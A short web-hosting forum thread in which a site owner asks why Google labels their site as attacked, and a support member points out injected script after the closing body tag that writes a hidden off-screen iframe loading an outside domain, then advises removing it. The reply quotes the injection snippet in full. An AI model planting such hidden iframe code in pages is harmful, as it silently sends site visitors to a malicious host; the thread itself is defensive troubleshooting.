attacked site

atchaya

New Member
Messages
23
Reaction score
0
Points
0
dear all

I have created and uploaded one html site. now a days while opening time it displays 'Attacked site' message from google. But i didn't add any files. what shall we do? i don't know. if any one knows pls inform me.

thanks in advance

my site address is : http://atchaya.com

atchaya
 

descalzo

Grim Squeaker
Community Support
Messages
9,373
Reaction score
326
Points
83
Scroll to the bottom of your page.
Bottom left, you will see a roughly 100x100 space...an iframe.
Ceated by this snippet of code that is after the closing </body> tag:

HTML:
<script>document.write('<iframe src="http://hulmeux.net/?click=55504500"
 width=100 height=100 style="position:absolute;top:-10000;left:-10000;">
</iframe>');</script>

Remove the code. Check your files for anything similar. Check to see what might be adding it to your pages.
 
Top